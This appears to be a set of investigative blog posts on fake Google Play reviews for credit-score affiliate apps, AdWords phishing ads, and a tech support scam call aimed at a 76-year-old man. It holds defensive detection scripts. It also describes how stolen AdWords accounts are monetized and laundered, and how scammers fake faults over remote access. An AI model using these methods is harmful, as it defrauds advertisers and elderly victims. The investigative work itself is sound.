The Fair Credit Reporting Act ensures that Americans are granted a free credit report from Equifax, Experian and TransUnion once every twelve months. If you are fortunate enough not to encounter a scammer along the way to getting your free credit report, then you’ll most likely end up at annualcreditreport.com.

Unfortunately, not everyone is so lucky. The FTC has something to say about Websites that are exploiting folks looking for their free credit report:

Other websites that claim to offer “free credit reports,” “free credit scores,” or “free credit monitoring” are not part of the legally mandated free annual credit report program. In some cases, the “free” product comes with strings attached. For example, some sites sign you up for a supposedly “free” service that converts to one you have to pay for after a trial period. If you don’t cancel during the trial period, you may be unwittingly agreeing to let the company start charging fees to your credit card.

There’s no shortage of exploitation in this vertical on the Web; just do a couple of searches for yourself and take a close look at the ads. Be careful if you’re a scammer looking to get in on the action: the FTC may come knocking!

Moving away from the Web, and using your favorite Android device, a quick search for “free credit score” on the Google Play App store yields hundreds of results.

google-play-reviews-00

google-play-reviews-01

Of interest in this article are search results #2 and #3:

#2: Free Credit Report & Scores by Sinsation: this app has 10,000 downloads and a review score of 4.6 out of 5 stars.

google-play-reviews-02

#3: Credit Score Pro Free Reports by Amazing Apps Inc: 5,000 downloads and a 4.7 out of 5 review score

google-play-reviews-03

In this piece, I am not going to prove how bad these apps are. Legitimate users have saved me the hassle here by taking the time to write a review and warn anyone who was considering a download:

google-play-reviews-04

So these apps are up to precisely the type of nastiness that the FTC warned against, i.e., promising a free credit report but then having users sign up to a service to get it.

What the average user who has been tricked by these apps does not know is that the apps are connected to one another in two very interesting ways.

Connection #1
The first connection is something you’d expect from an app/Web site discussed here: Affiliate Marketing.

Observation of the network activity behind each app [1, 2] shows us that they redirect through an affiliate link which then forwards on to the merchant that will pay the affiliate in the event of a sale: creditscorepro.com.

Note that both apps start with a GET request to a different .info domain (thegreatestever.info and thedatingconnection.info) before routing through to creditscorepro.com using the same affiliate id (AFID=278315), suggesting that the same entity is behind both apps. This is surprising because they are published under separate publishers (Sinsation & Amazing Apps Inc).
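
For the curious, here is roughly how one could check a chain like this for yourself. This is a minimal sketch: it assumes the redirects are plain HTTP (a Flash or Javascript hop would not be followed by requests) and uses only the bare domains observed above, not the exact URLs the apps request.

```python
# Minimal sketch: follow a redirect chain and report any AFID parameter seen
# along the way. Assumes plain HTTP redirects; JS/meta-refresh hops will not
# be followed. The starting URLs are the bare domains observed above, not the
# exact URLs the apps request.
from urllib.parse import parse_qs, urlparse

import requests

START_URLS = [
    "http://thegreatestever.info/",      # observed behind app #2
    "http://thedatingconnection.info/",  # observed behind app #3
]

def trace_affiliate_chain(start_url):
    resp = requests.get(start_url, allow_redirects=True, timeout=15)
    hops = [r.url for r in resp.history] + [resp.url]
    for hop in hops:
        afid = parse_qs(urlparse(hop).query).get("AFID")
        if afid:
            print(f"{start_url} -> {urlparse(hop).netloc} (AFID={afid[0]})")
    return hops

if __name__ == "__main__":
    for url in START_URLS:
        trace_affiliate_chain(url)
```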

Now creditscorepro.com is not the bad guy here; they are trusting their affiliates not to get up to these types of shenanigans. You can take a look at their terms on a number of affiliate networks to verify this.

From their program on LinkConnector, note the language:

Due to FTC regulation, no “Free Credit Report” messaging

From their program on AffiliateWindow, note the language:

Due to FTC regulation, no “Free Credit Report” messaging

Also note that creditscorepro.com will pay the affiliate $26 per user that is sent their way. This is important because it is in this manner that the author of the apps is monetizing his/her efforts:

  1. Create an app and publish on the Google Play app store
  2. Market it as a means to get a free credit score
  3. Refer users of the app to creditscorepro.com through an affiliate network
  4. Creditscorepro.com pays affiliate network for each successful lead
  5. Affiliate network pays author of the app (profit!)

The affiliate behind these apps is using the ratespecial.com affiliate network, so we don’t get to see the precise terms that creditscorepro.com has on this network (they are not publicly available). It stands to reason, though, that they are very similar to the terms on LinkConnector and AffiliateWindow.

What’s interesting on the ratespecial.com network is that their Terms and Conditions for the entire network do not accommodate affiliates using apps of this nature; in the text below they essentially limit their affiliates to the Web and email:

5.    Restrictions. For any Engagement, subject to any greater restrictions in the applicable Accepted Offer Terms, Affiliate Network and or Publisher may promote the applicable RPS by banner advertisements, button links and/or text links (collectively hereafter the “Links”), contextual links for popup advertisements and email that is compliant with all applicable laws. Subject to the prior written and continuing approval of RateSpecial, promotional Links may contain the trade names, service marks, banners, buttons, and/or logos provided by RateSpecial on the Affiliate Network and or Publisher Portal for display on the websites used for Affiliate Network and or Publisher’s Engagement. Use of creative material that is not approved by RateSpecial will disqualify any resulting events from being “Actionable Events”. If the applicable Accepted Offer Terms says “WEB ONLY”, the foregoing materials are only allowed on the websites of Affiliate Network and or Publisher (and for avoidance of doubt cannot be used in email or in Links). If the applicable Accepted Offer Terms says “EMAIL ONLY”, Affiliate Network and or Publisher (and its agents) must limit the related promotional activities to emailing to lists, which for the avoidance of doubt are limited only to those created, managed, and treated in compliance with all applicable law. If the applicable Accepted Offer Terms says “CONTEXTUAL LINK ONLY”, then Affiliate Network and or Publisher may only promote RPS using Links, using them to direct potential customers of RPS directly to the website(s) designated in the Accepted Offer Terms.

Of course, as mentioned above we don’t get to see precisely what the Accepted Offer Terms are, but it’s probably in line with the terms of programs on other affiliate networks.

Connection #2
Two minutes into investigating apps of this nature, one can’t help but wonder:

“If these apps are such rubbish, then how is it that they each have thousands of downloads and so many favorable reviews?”

James Grubbs, a helpful reviewer from one of the apps above, has it all figured out:

google-play-reviews-05

It just makes sense: these guys are faking their reviews.

If you take a deeper look at the reviews of each app, you’ll find that there are in fact quite a few reviews that are remarkably similar, but posted under different names:

google-play-reviews-07 google-play-reviews-06

The red outline was added by me; it highlights the portions of each review that are exactly the same.

After going through the awful reviews and carefully inspecting the network activity behind each of these apps, it’s obvious that they are designed to deceive. And yet in spite of this they number installs in the thousands and overall have an astounding review score of 4.6 out of 5 stars.

There’s something not quite right here; one or two fake reviews surely can’t do this.

With this in mind, I thought it would be interesting to investigate fake reviews on a larger scale in an effort to answer the following question:

Are fake reviews a significant problem on the Google Play app store?

If one can’t trust the reviews of an app, then one must question the integrity of the entire store. After all, when the app store displays apps by “Top Paid”, “Top Free” and the like, it is surely including the number & nature of each app’s reviews as a factor when deciding where to rank them. It doesn’t take much to arrive at this conclusion, for there’s simply no anonymous “link” system to serve as part of a powerful ranking function as there is on the Web.

So to get to the bottom of this, I decided to first define a fake review using the two apps above as a basic frame of reference, keeping in mind that we want to minimize the chance of labeling a legitimate review as fake.

We take into account the following:

  • The fake reviews we want to detect are those that intend to improve an app’s overall score in the store, not lower it, so we’re going to look for reviewers dishing out a minimum of a 4-star review for an app. Of course, there are scammers that will try to lower another app’s score (their competitors’, thereby lowering its ranking), but that’s not our focus today.
  • Fake reviews are going to be mostly generated by automation, and the result of something the SEO pundits call spinning: “rewriting existing articles, or parts of articles, and replacing specific words, phrases, sentences, or even entire paragraphs with any number of alternate versions to provide a slightly different variation with each spin”
  • Shorter reviews are obviously going to be very similar, if not exactly alike, to a number of other reviews. This just makes sense: the fact that the review “I love it” is everywhere does not mean they are all fakes. Scammers know this too, so they camouflage their reviews by keeping them short. Of course, every now and again a scammer gets creative, so instead of keeping things short, they spin long stories, which make for easier pickings when it comes to detection.

A brief overview of our method for detecting spinning is in order, for this is ultimately how we detect a fake review:

  • Break down each review into a set where each element is a word
  • Sets with fewer than N elements will not be considered. We have to be careful what value we choose for N here: the smaller it is, the more likely we are to increase the false positive rate. The two apps from above seem like a pretty good baseline, and it’s hard to argue that they are not fake. If you have a compelling argument as to why I’m wrong on this, please do get in touch. Otherwise, the two reviews shown above break down into sets of 75 and 57 elements respectively. With this in mind, and in an effort to keep this simple enough that someone without a degree in statistics/mathematics can easily follow along, we set our minimum review length to 50
  • We then take the intersection of each set with every other set. If the size of the intersection, relative to the sets, is greater than a configurable threshold (their similarity, in this case), then the sets are derivatives of one another and the associated reviews are marked accordingly, i.e., we have a fake review. The two reviews above are 73% similar to one another, so I chose to work with a 70% similarity threshold in this experiment (a short sketch of this procedure follows the variable list below)

The variables used are thus defined as follows:

  • Minimum set length (number of words in a review): 50
  • Minimum review score (score that the reviewer gave the app): 4
  • Minimum review similarity (similarity to another review in order to be considered as a fake): 70%
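
To make the procedure concrete, here is a minimal sketch of the detector described above. The exact normalization of the intersection isn’t spelled out, so this sketch normalizes the overlap by the size of the smaller set (one reasonable choice), and the review field names are assumptions for illustration.

```python
# Minimal sketch of the fake-review detector: reduce each review to a set of
# words, drop short reviews and low scores, then flag any pair of sets whose
# overlap exceeds the similarity threshold. Brute-force pairwise comparison;
# slow but workable at the scale of ~16k eligible reviews.
from itertools import combinations

MIN_WORDS = 50         # minimum set length (number of words in a review)
MIN_SCORE = 4          # minimum review score
MIN_SIMILARITY = 0.70  # minimum similarity to another review

def word_set(text):
    return set(text.lower().split())

def similarity(a, b):
    # Overlap normalized by the smaller set: one reasonable interpretation,
    # since the exact normalization is not spelled out above.
    return len(a & b) / min(len(a), len(b))

def find_fakes(reviews):
    """reviews: iterable of dicts with 'author', 'app', 'score', 'text' keys
    (field names assumed for illustration)."""
    eligible = [(r, word_set(r["text"])) for r in reviews
                if r["score"] >= MIN_SCORE and len(word_set(r["text"])) >= MIN_WORDS]
    flagged = []
    for (r1, s1), (r2, s2) in combinations(eligible, 2):
        sim = similarity(s1, s2)
        if sim >= MIN_SIMILARITY:
            flagged.append((r1["author"], r1["app"], r2["author"], r2["app"], sim))
    return flagged
```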

The Data
The data set used for our analysis includes all reviews of all apps found in the Google Play app store. On 2014-09-09 we indexed what was publicly available on the Google Play app store and found 2,719,686 reviews written by 2,084,818 reviewers of 852,137 apps.

Whilst this is great data, it is by no means a 100% copy of what is in the Google store. The reason is that Google only exposes a fraction of the reviews for each app. You can verify this for yourself by loading up an app through Google Play on Android or via your Web browser and trying to scroll through all of the reviews; note that only a small number of reviews are served.

Results
With a minimum set length of 50 and a review score of at least 4, we found 16,450 eligible reviews from 15,368 authors. Comparing every review to every other review, we found 172 reviews with at least 70% similarity to another review from a total of 82 authors. In this tab delimited file we tabulate the results in the form of details for each review along with the reviews that were similar to it and the similarity score.

Now consider a directed graph where edges are reviews, grey nodes are authors (labelled with the author id) and red nodes are apps (labelled with the app id that was reviewed). You can interpret the image below as “author 108446078933376544807 provided a fake review of the app with id appinventor.ai_northeastapps12.FreeCreditReport”

google-play-reviews-08
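
For reference, a graph like the one pictured can be assembled in a few lines with networkx. This is a minimal sketch, and the flagged (author, app) pairs are assumed to come from a detector like the one sketched earlier.

```python
# Minimal sketch of the author/app graph: grey nodes are authors, red nodes
# are apps, and each directed edge is a flagged review.
import networkx as nx

def build_review_graph(flagged_pairs):
    """flagged_pairs: iterable of (author_id, app_id) tuples for flagged reviews."""
    g = nx.DiGraph()
    for author_id, app_id in flagged_pairs:
        g.add_node(author_id, kind="author", color="grey")
        g.add_node(app_id, kind="app", color="red")
        g.add_edge(author_id, app_id)  # "author reviewed app"
    return g

# The single edge shown in the image above:
g = build_review_graph([
    ("108446078933376544807",
     "appinventor.ai_northeastapps12.FreeCreditReport"),
])
```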

We know the review is fake because it is at least 70% similar to another review in the app store. Don’t be surprised that it is a free credit report app. Here’s the review written by author 108446078933376544807:

im a really big fan – everyone should use it its very important to know your credit score especially at this time around the holidays. im really glad i checked because it got me much better rates on a loan i applied for. i would suggest it for anyone who wants to check their scores on the go.. good thing is its sooo simple no bones about it, just gives you the report and score directly to your phone. easy to use it only took a couple minutes and i had both reports and scores. thankful that i found it

And here’s the same review of another app (appinventor.ai_GSDesign39200.BestPennyAuctions), from a different author (104192597425876737411), that was 98% similar:

fine im a really big fan – everyone should use it its very important to know your credit score especially at this time around the holidays. im really glad i checked because it got me much better rates on a loan i applied for. i would suggest it for anyone who wants to check their scores on the go.. good thing is its sooo simple no bones about it, just gives you the report and score directly to your phone. easy to use it only took a couple minutes and i had both reports and scores. thankful that i found it

So other than the word “fine” two separate authors for two separate apps had precisely 98 words and 507 characters that were exactly the same.

If you carefully examine the tab delimited file above, it’s evident that there are a number of reviews marked as fake that are not necessarily malevolent in nature, for example, when the same reviewer reviews two separate but similar applications:

google-play-reviews-09

So author 114210272673494778688 reviewed the free and paid version of an app with precisely the same review:

this is an excellent memory game for young kids. it is biblically based and helps kids develop their memory and picture association. the sounds help kids remember where the animals are and can be turned off for more of a challenge.   my son (4 months) is too young to play it himself but he loved watching the animals and hearing the sounds. i would definitely recommend this game for anyone with kids!

The author is clearly not trying to hide what he is doing (100% review similarity from the same author) and the review itself seems genuine. Ordinarily one may be quick to add a condition which ignores identical reviews from the same author, but then we’d be ignoring little clusters like these:

google-play-reviews-10

The author here is simply pasting the following review verbatim for each app:

just like the content included with the main application, this add-on content is fantastic quality, incredibly realistic-sounding and certainly much better than what alternative applications are offering! whether this particular add-on is for you is personal preference, but at least with lightning bug you have a wide range of choices that sound great, work well and use very little storage space…

This author is obviously adding no value, and as we’ve shown it’s easy enough to detect this.

A quick look at the original author that kicked this project off:

google-play-reviews-11

Michael Cohrs (author 105002329817833480149) did a fake review for CreditScorePro. This review was 100% similar to the review performed by Alvin Moses (104842832943339004409):

i tell my friends i would like to consider myself financially responsible so an app like this is just perfect for me. especially before making big purchases, its so important these days to know your score. that makes me so happy that i found an app on google that does exactly that, with no other stupid popup ads or anything like that to deal with. overall i guve it 4 stars

This review is also 100% similar to the review from Joyce Brothers (author 114529626562499288016), who reviewed FreeCreditScore; the cluster also includes a review from Kenda Minda (author 112746229244334005942, our original fake author) that is 96% similar:

google-play-reviews-12

Easily detected rubbish reviews for near-five-star rubbish apps.

Thus far the variables for defining a fake review have yielded a relatively small data set to explore, but it’s still fascinating what’s in there:

google-play-reviews-13

In this cluster we have 5 authors responsible for 10 reviews of 4 apps:

  • Author 117831797660947426021’s review of com.martingamsby.orplus is 98% similar to the review from 107129133670198971212 and 89% similar to the review from 109575713192283562186
  • Author 117831797660947426021’s review of com.gobid is 100% similar to the review from 111772687247355872036 and 100% similar to the review from 102652010949230761474
  • Author 117831797660947426021’s review of com.mzdevelopment.musicsearch is 94% similar to the review from 102652010949230761474. What’s interesting about these two reviews is that the reviewer is merely shuffling the order of the words (ordering we throw away anyway, thanks to the set-based nature of how we detect fake reviews)
  • Author 117831797660947426021’s review of com.gappsolutions.skyman is 94% similar to the review from 102652010949230761474

Given that a cluster this interesting can be found with what is a fairly limiting constraint for eligible reviews (recall the minimum set length of 50), I decided to reduce the minimum set length by 20% to see if it would yield any more interesting results:

  • Minimum set length (number of words in a review): 40 (down from 50)
  • Minimum review score (score that the reviewer gave the app): 4
  • Minimum review similarity (similarity to another review in order to be considered as a fake): 70%

With these settings, we found 35,938 eligible reviews from 33,120 authors. Comparing every review to every other review, we found 336 reviews with at least 70% similarity to another review from a total of 161 authors. Results available in this tab delimited file.

The same cluster from above transforms into a larger cluster which now includes 10 authors responsible for 26 reviews of 11 apps.

google-play-reviews-14

The additions:

  • Author 116451052766263427395’s review of com.sndapps.zombiepiano is 100% similar to 106235084813202092445’s review of the same app
  • Author 116451052766263427395’s review of com.javi.hungry.dragon is 100% similar to 117054880620692184006’s review of the same app
  • Author 116451052766263427395’s review of com.DarkCarnival.Sharkz is 96% similar to 112114267199436446596’s review of the same app
  • Author 116451052766263427395’s review of com.tekbrix.findplus is 100% similar to 106718374237046178982’s review of the same app
  • Author 116451052766263427395’s review of com.selpheeinc.selphee is 100% similar to 109575713192283562186’s review of the same app
  • Author 116451052766263427395’s review of com.yoni.skyattack2 is 100% similar to 109575713192283562186’s review of the same app
  • Author 112114267199436446596’s review of air.com.nanico.skifleet is 100% similar to 109575713192283562186’s review of the same app

These reviews are obvious fakes: created or controlled by a single entity. At best they’re different instances of the same automation. Either way, what’s clear is that these reviews are junk. And if the reviews are junk, then what does that say about the app being reviewed? Moreover, what about the author? Well, we know what it says about the author (automated), which raises the question of what this says about the rest of the reviews written by these automatons (and the reviewed apps) that did not meet the conditions of this study. To get an idea of how much of a problem this is, I rebuilt the small graph above but added all reviews from the authors identified (now in orange) in the cluster above:

limited author ids - graph - bad authors to all reviews

Just answer the question!

So, are fake reviews a significant problem in the Google Play store?

Absolutely, and here’s why:

  • We ran a very simple algorithm against a fraction of the reviews in the Google Play store and still found a surprising number of fake reviews, including some interesting clusters of badness. Obviously, such a simple algorithm was designed to find simple scammers: bottom of the barrel, at the end of the day, really. So if we can find the simple guys with such a simple technique, who’s to say what the more capable scammers are up to? Arguably the most important issue here is that this strongly suggests Google is not trying to detect & remove fake reviews, not even the simple ones
  • There’s quite a market for selling reviews. Spend ten minutes on fiverr and you’ll quickly get a feel for how much one pays for positive (and negative) reviews: $5 for 8, or $40 for 100. More enterprising publishers may consider employing the services of app2top.org, who boast having sold more than 21,000 stars and 6,000 reviews. Their prices average $0.25 per review and they can deliver up to 200 reviews per app per day

google-play-reviews-15

My thanks to Ben Edelman for his thoughts on early versions of this article.

A reader sent me an email asking me to clarify the following statement from my last post:

“AdWords credentials are big bucks, more so if you phish a premium account.”

Platforms the likes of AdWords are constantly under attack. It’s astonishingly simple to verify this for yourself:

  • Head on over to google.com
  • Search for “adwords login”
  • Note the first ad

adwords_phishing_1

Inconsistencies with the first ad:

  • Display URL is for www.acefingerprint.com
  • Destination URL is for roofing-contractors-toronto.com

Clicking on the ad will land you here:

adwords_phishing_2

Doesn’t get any easier than that to find someone attacking AdWords. Now remember, an attack on AdWords is an attack on all of the users of AdWords (Google’s advertisers). If Google is at the very least trying to protect their own vertical from abuse (their advertisers), then they’re not doing a very good job at it.

Once an attacker has valid AdWords credentials there are a few ways to monetize:

  1. Sell the account. Forums to sell a compromised account of this nature are in no short supply.
  2. Sell the traffic. The attacker brokers a relationship with someone who wants to buy traffic at a discount rate. This relationship most likely exists before the account is compromised. The attacker can offer huge volumes of traffic at ridiculous prices because the traffic she is selling is stolen (much like buying and selling goods on the black market). The attacker can either modify the keywords of the compromised account to send targeted traffic, or just roll with what the account has anyway and maybe increase the bid price.
  3. Target a specific vertical and launder the traffic. At the end of the day, with a compromised account the attacker has free traffic. If it’s a premium account then the attacker has huge volumes of free traffic. An example of a premium account would be an advertiser who spends $10,000 a day on ads. When you’re dealing with the massive volumes that such a budget will bring, one has only to steer the traffic towards a somewhat probable monetization path and the machine will take care of the rest. For example, the attacker could set herself up as an affiliate in the Payday Loans vertical. The attacker then sets up an AdWords campaign in the Payday Loans vertical and sets her bid price to crush everyone else (it’s not her money, so why play nice?). The attacker funnels traffic from this campaign to a legitimate buffer site which launders the traffic and forwards it on to the merchant facilitating Payday transactions/leads. Some of these will convert, which in turn will pay the attacker.

What’s still somewhat puzzling is why Google is not protecting their own vertical. If an AdWords account is compromised then the advertiser is going to lose money on ads that she did not purchase. If the advertiser loses this money then the advertiser is going to seek a refund. If the advertiser gets the refund then Google is going to lose money. If Google loses money then it’s within their interest to protect this vertical.

Of course, the simplest answer here may be that the cost of protecting this vertical (or any vertical) outweighs the cost of just issuing refunds in the event of a compromise. That’s fine from a pure monetary perspective, but what of the bad press that comes from posts the likes of what we saw on Reddit, or the future revenue lost from an advertiser who has had enough and shifts to an advertising platform that does invest in protecting its own vertical and those of its clients?

This Reddit post discusses an advertiser that is using Google’s AdWords system to phish Blockchain.info subscribers. If you’re not security/tech savvy, what this translates to is that an AdWords advertiser is tricking Google users into thinking that he/she is the face for another legitimate Web site. The idea is to steal user credentials.

As an attacker, using AdWords just makes sense. Why go through all of the effort of organically growing a site to place high up in the organic rankings of Google, or even compromise an existing site, when Google AdWords will place you right at the top of the results page for a small fee per user that they send your way? Using the AdWords system, an attacker can then precisely tune which region they want to target and even what time of day they would like the traffic to come their way.

One of the Reddit users posts

“The fact they allow this is ridiculous.”

Google does not allow this. Note the following from the AdWords Terms and Conditions:

“Ad Serving.  (a) Customer will not provide Ads containing malware, spyware or any other malicious code or knowingly breach or circumvent any Program security measure.”

One could make the argument that Google is just protecting themselves by adding this to their terms and conditions, and nothing more. Once Google has said that you’re not allowed to do this, they can wash their hands of all of this and only take a reactive approach, i.e., shut down an account when enough people complain.

This argument is insufficient to hold any weight on its own, though. The problem with it is that by not proactively searching for this nonsense, Google leaves itself open to precisely the same form of abuse.

Google AdWords Advertiser Targets Google AdWords

The advertiser highlighted by the red arrow below is phishing Google AdWords customers, using the Google AdWords infrastructure on the Google.com homepage when searching for “adwords”

adwords advertiser phishing adwords advertisers

Upon clicking the ad, the user is redirected to the following landing page:

adwordsphishing

Note this landing page is obviously not the official AdWords landing page. It is an attacker trying to lure unsuspecting victims into handing over their AdWords credentials. AdWords credentials are big bucks, more so if you phish a premium account. The attacker essentially acquires a powerful means with which to print money for himself until the account is closed.

Taking a closer look at the ad, note the inconsistencies:

  • The display URL (in green) is trasterosm2.com
  • The page I landed up at is friendsch.info
  • The destination URL (the first URL that a user is redirected to upon clicking the ad URL) is azmatkhans.com, surely a compromised site that is being exploited as a buffer for the redirect

The trick is that it’s easy to see these inconsistencies in review of an attack, but not in preview of a new AdWords campaign. When this advertiser first set up the campaign, the display URL probably matched the destination URL and, in turn, the final landing page. With some time, and by sampling users for an attack (selecting 1 out of every 10, for example), the attacker can slowly creep his way into the system, even if Google is proactively searching for this form of abuse.
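
As a rough illustration of the kind of check involved, here is a minimal sketch that resolves an ad’s destination URL and compares the final landing domain with the advertised display domain. It assumes plain HTTP redirects (a Javascript hop like the one above would need a real browser) and uses a crude two-label domain comparison rather than a proper public-suffix list.

```python
# Minimal sketch: does the advertised display domain match where the ad
# actually lands? Crude domain comparison; JS redirects are not followed.
from urllib.parse import urlparse

import requests

def registered_domain(url):
    host = urlparse(url).netloc.lower().split(":")[0]
    return ".".join(host.split(".")[-2:])  # crude; use a public-suffix list in practice

def display_matches_landing(display_url, destination_url):
    resp = requests.get(destination_url, allow_redirects=True, timeout=15)
    landing = registered_domain(resp.url)
    display = registered_domain(display_url)
    return display == landing, display, landing

# For the ad above, the display domain (trasterosm2.com) would not match the
# page actually landed on (friendsch.info).
```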

In the Tech Support scam, a scammer hijacks a well known brand in an effort to lure a victim who is then deceived into paying for an unnecessary/non-existent service or installing malware infected payloads.

This scam has been picked up by quite a few players in the last couple of years, successfully catching people left, right and center. If you want to bring yourself up to speed on how scammers have evolved in this space, you’ll find lots of documentation from the FTC, the Malwarebytes team and Microsoft.

When I think about a scam, of course the first question I ask is who is the victim, and eventually it’s interesting to figure out how the money flows. In today’s example, I’ll show you how a Tech Support scam flows from beginning to end. We’ll discuss who the victims are and we will examine the players that make money from all of this.

So with a couple of cell phones, a few false names and an intentionally flawed Virtual Machine (one which had not been activated) I decided to see what Tech Support scams looked like for myself.

The reason I chose a VM which had not yet been activated is because I wanted to see if the people I phoned for tech support pointed out the most obvious potential problem with the machine, i.e., that it had not yet been activated.

Online Advertising

On Friday the 23rd of May 2014, I found this Google advertiser:

google_advertiser_5_23

It looks like he has an advertising campaign that is constantly running and targeting folks who are looking to log into their RoadRunner email:

5/23 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/23 – Google Advertiser URL leads to http://rrhelp.in/Log_In.htm
5/24 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/27 – Google Advertiser URL leads to http://www.rrlgn.in/Log_In_To_Account.htm

For each of these ads, the landing page will display the following message:

“Attention: Your Account Has Been Disabled Please Call 1-855-666-8849”

google_advertiser_tech_support_scam_0

It’s obvious what is happening here, but to be clear: this advertiser has hijacked the TWC Road Runner login page and is trying to deceive the user into thinking that there is a problem.

Depending on what your referrer to this page is (the site responsible for sending you here), the message could also be:

“Attention User Account Is Under Review Please Call RoadRunner Support 1-800-463-6338”

That the message/number changes matters not, for the intent remains the same: deception. In each case the advertiser has hijacked the TWC RoadRunner page and is trying to con the user into phoning the falsified tech support line.

What I thought was really interesting here is that they are not even bothering to steal credentials; they just want you to call in and fall victim to a quick scam that will send real dollars their way. Regarding the pic below, note that I entered false credentials and then pushed Login. Upon analyzing a packet trace for this activity, I found no evidence of credentials being sent to a server.

google_advertiser_tech_support_1

“Error code: RR-D68547 Your Email Account Has Been Temporary Suspended Due to Suspicious Activity Detected. Please RoadRunner Support on +1-800-463-6338”

Not stealing credentials actually makes a whole lot of sense if you think about it a little. If they were stealing usernames and passwords then this would be an open and shut case. It would not take much for chaps like me to gather evidence against players that steal credentials in this manner, in which case they could land themselves in hot water pretty quickly.

Moving on, I called the guys behind 1-855-666-8849 a few times, and each time I phoned they always answered with “Thank you for calling <GARBLED> technical support”. The <GARBLED> part is intentional on their side; they want you to think it’s your fault you did not hear them properly. Sometimes I asked what technical support they were, but I never got an answer.


Download audio

Unfortunately my initial attempts to get to the bottom of the scam didn’t get me very far. I think I came across as unconvincing, someone who might be a threat to their scam, and so each time they ended up putting the phone down on me. Upon reflection, I think my problem was that I assumed from the get-go that they were trying to sell me an antivirus solution, and my guess is this is what kept throwing them off. They would always tell me my computer was broken/compromised, that things had gone wrong and they needed to access it. They never told me how to facilitate this; I told them I had no idea what they were talking about and kept waiting for them to take the lead.

As I kept trying to see what this particular tech support scam was all about, it became evident to me that where other scammers were trying to get folks to download and install something, these guys were up to something different.

So I involved a senior citizen (my dad!), someone who I figured was the real target of their scam.

The result was quite different.

Download Audio

Highlights of the call:

04:50 scammers convince my father to let them take control of the machine. They ask him to load logmein123.com; this redirects to secure.logmeinrescue.com, where they then ask him to enter the code 24227

logmein123

07:10 My father asks who they are; he clearly says “Are you TWC?” This is followed by a moment of silence and then their response: “Yeah”

09:39 They have taken control of the machine; they then ask my father to log into his email so they can see the problem. What they did here was really sneaky. As he was typing in the password, they would keep pushing the caps lock key on their side, which meant that even if we were at the right service URL typing in the right credentials, they would be entered incorrectly and our login would be denied. This would open the door for the scammers to prove that there certainly was a problem.

scammers 2

10:28 you can hear my father tapping the keyboard five times for a five character password and counting silently to himself. Mysteriously, a sixth character appears in the password prompt. Obviously scammers are entering the final character to keep forcing incorrect credentials.

scammers 4

11:30 scammer opens a command line window and types “EMAIL HAS BEEN HACKED”. My dad falls for this and starts to panic, when my father asks if his email has been hacked the scammer says “Yeah, that’s the problem sir, yeah”

scammers 5

13:58 scammer says “don’t worry, I am here to help you” whilst trying to scare my father by showing him logs from the Windows event log, all of which is completely normal

18:52 “are you a senior citizen sir?”

“Yes mam I am 76”

19:22 my father asks “are these experts from Microsoft?” to which the scammer responds “yes sir”

20:00 scammer explains to my father the difference between what Bestbuy’s Geek Squad offers and what they are offering. It’s all so confusing, but it’s supposed to be a good deal. Note the question my father asks at 20:50

“And these are specialized technicians from Microsoft, Yes”

“Yes”

scammers 6 scammers 7

21:56 scammer loads up secure.nmi.com and logs in with merchant id “ishan.865tasu”

scammer 8 scammer 10

For the first time we are privy to what their real identity may be, or at least what they are using to transfer funds: “International Technical Support Corporation”. If you’re following this call carefully, you know that the scammer just made a mistake on their side. They just logged my father directly into their merchant account; obviously they don’t know that I just fell off the chair next to him.

22:50 They enter the Order ID ITSC102504 and will try to convince my father to complete the form with his details. Note the question my father asks before trying to complete the form

“Do you have special rates for over the age of 75?”

scammer 12

23:38 My father asks if he can spend the $599 over a period of time instead of as one large payment. He explains that $600 is his rent for the month. They know he is an elderly gentleman; they know they are exploiting his trust. They know they are about to steal money that he cannot spare. What’s sad here is that my father is not a real victim, but they don’t know that. How many elderly people have actually fallen for this scam? We’re about to answer that question thanks to these guys logging us into their merchant account.

26:18 scammer shares their address: “1113 6th ave, New Hyde Park, NY 11040”

31:00 scammer becomes impatient after we click refresh, nullifying everything we had spent the last ten minutes completing. She decides to transfer us to another scammer, but we decide to end her remote session and take a closer look at their merchant account.

Of interest to me at that point in time was how much money these unscrupulous individuals had made thus far. I used the Quickbooks feature of the merchant panel to get a quick idea.

scammer 13

Just to be clear here, for this account alone the scammers have conned 1,538 people with this scam. At a total of $439,254.91, they are averaging roughly $286 per person. What’s more terrifying here is the extremely low 3% rate of chargebacks/reversals; these are the people that were savvy enough to see the scam and then demand a refund from their credit card company.
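
For what it’s worth, the arithmetic from the panel works out as follows (the 3% figure is the approximate chargeback/reversal rate shown in the panel):

```python
# Back-of-the-envelope numbers from the merchant panel above.
total_charged = 439_254.91
victims = 1_538
chargeback_rate = 0.03  # approximate rate of chargebacks/reversals

print(f"average per victim: ${total_charged / victims:,.2f}")         # ~$285.60
print(f"victims who charged back: ~{victims * chargeback_rate:.0f}")  # ~46
```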

I shouldn’t have to say that this practice is unscrupulous. These are without a doubt scammers of the lowest possible order, bottom feeders that target old people and those that are not tech savvy enough to know any better.

The Players

1. Google facilitates the first part of this scam by allowing advertisers of this ilk onto their network. Average users, old people, kids, moms, tech elites, you name it: they trust the results given to them by a search engine. So why shouldn’t they trust what the page behind that first click tells them: “Attention: Your Account Has Been Disabled Please Call 1-855-666-8849”? After all, there’s no warning on the search result page saying “Hey, be careful of these advertisers, we have no idea who they are or what they are going to try to sell you!”

Obviously the scammers know how trust is delegated here, so they will pay Google to exploit this as an advertiser for as long as they are allowed to do so.

But is Google a victim? Sure. Whilst they are taking the scammers’ money to show the ads in question, they are also indirectly a victim. Fingers will point to services the likes of theirs when one traces the scam back to its origin.

2. NMI.COM – Network Merchants LLC, for a fee I presume, is allowing the money to flow from the target of the scam (my senior citizen dad in this case) through to the scammers. At the end of the day what the scammers are doing here is wire fraud, plain and simple. So if NMI didn’t know about the half million dollars these scammers potentially defrauded from victims before, they sure know about it now.

3. TWC Road Runner. They’re another victim. It’s their service that is being hijacked and their users plundered. Ultimately victims are dialing the support number listed because they thought TWC Road Runner disabled their account.

4. Microsoft. The scammers are using legitimate programs on a Microsoft Operating System to make the victims think something is wrong with Microsoft software. We know that it’s all just a lie though; the event viewer is filled with legitimate warnings and errors. Typing “EMAIL HAS BEEN HACKED” in a command prompt does not mean that your email is hacked.

Furthermore, they hijack the Microsoft brand by saying that they are from Microsoft. Recall 19:22 where my father asks “are these experts from Microsoft?”

“yes sir”

